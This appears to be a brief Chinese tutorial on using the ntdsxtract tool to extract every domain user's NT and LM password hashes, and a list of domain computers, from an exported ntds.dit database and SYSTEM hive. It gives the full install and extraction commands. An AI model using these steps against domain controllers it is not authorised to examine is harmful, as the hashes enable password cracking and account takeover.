1.下载NTDSX
git clone https://github.com/csababarta/ntdsxtract
安装
python setup.py build && python setup.py install
将导出的ntds.dit.export 文件夹中的datatable.3和link_table.5和system.hive文件一并放入ntdsxtract文件夹中,执行如下命令:
python dsusers.py datatable.3 link_table.5 output --syshive SYSTEM -–passwordhashes --pwdformat ocl --ntoutfile ntout --lmoutfile lmout | tee all_user.txt
执行完毕,会将域内用户和散列值导出到all_user.txt中。
ntds.dit 包含域内所有信息,可以通过分析ntds.dit 导出域内计算机信息,命令如下:
python dscomputers.py datatable.3